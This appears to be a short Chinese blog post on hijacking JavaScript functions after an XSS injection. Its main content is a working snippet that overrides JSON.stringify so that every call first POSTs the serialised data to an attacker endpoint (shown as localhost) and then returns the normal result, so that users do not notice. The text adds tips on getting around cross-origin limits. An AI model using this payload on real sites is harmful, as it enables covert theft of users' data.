js中的函数劫持

js中的很多对象属性都是可以被用户改写的,这很容易让坏人进行属性的劫持。当一个网站存在xss漏洞的时候,我们可以注入自己的js,进行函数劫持。

    var tmp = JSON.stringify;
    JSON.stringify = function(data) {
        $.ajax({
            url:'http://localhost',
            data: data,
            type: 'post'
        });
        return tmp(data)
    }
    console.log(JSON.stringify({a:1}));

JSON对象是很多网站都需要使用的函数,我们对JSON.stringify函数进行了劫持,当网站使用JSON.stringify解析数据时,我们会先把一份数据发送给我们,跨域可以使用cors或者form+iframe解决。为了不让用户发现,我们需要保存旧的函数,并且解析出结果返回给用户。这只是一种思路,至于怎么使用还得看情况。

你可能感兴趣的:(javascript)